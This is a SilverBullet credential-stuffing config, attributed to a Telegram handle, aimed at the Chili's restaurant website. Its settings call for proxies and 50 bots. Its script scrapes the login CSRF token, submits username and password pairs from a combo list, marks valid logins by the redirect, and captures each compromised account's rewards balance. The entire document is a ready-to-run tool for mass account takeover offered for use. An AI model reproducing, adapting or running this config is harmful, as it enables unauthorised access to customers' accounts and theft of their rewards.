[SETTINGS]
{
  "Name": "Chilis.com Fc @ALone_DeviLz1",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2024-07-17T08:23:39.0941727-07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@ALone_DeviLz1",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "Join : @ALone_Devilz1",
      "VariableName": "",
      "Id": 1947811408
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "chilis",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://www.chilis.com/login" 
  
  HEADER "Host: www.chilis.com" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1" 
  HEADER "Referer: https://www.chilis.com/account/rewards" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Connection: close" 

#csrf PARSE "<SOURCE>" LR "name=\"_csrf\" value=\"" "\"" -> VAR "csrf" 

#PASS1 FUNCTION URLEncode "<PASS>" -> VAR "PASS1" 

REQUEST POST "https://www.chilis.com/login" 
  CONTENT "_csrf=<csrf>&username=<USER>&password=<PASS1>&_rememberMe=off" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: www.chilis.com" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Origin: https://www.chilis.com" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1" 
  HEADER "Referer: https://www.chilis.com/login" 
  HEADER "Content-Length: 105" 
  HEADER "Sec-Fetch-Dest: document" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Unable to log in to My Chili's Rewards" 
    KEY "Incorrect My Chili's Rewards" 
  KEYCHAIN Success OR 
    KEY "<ADDRESS>" EqualTo "https://www.chilis.com/menu" 

REQUEST GET "https://www.chilis.com/account/rewards" 
  
  HEADER "Host: www.chilis.com" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Referer: https://www.chilis.com/menu" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

#Rewards PARSE "<SOURCE>" LR "</div><a id=\"rewards-logged-in-summary-rewards\" class=\"rewards-link\" href=\"#rewards\">" "</a>" CreateEmpty=FALSE -> CAP "Rewards" 

FUNCTION Constant "@ALone_DeviLz1" -> CAP "Configs By " 

FUNCTION Constant "@SilverBullet_Configs1" -> CAP "Join : " 

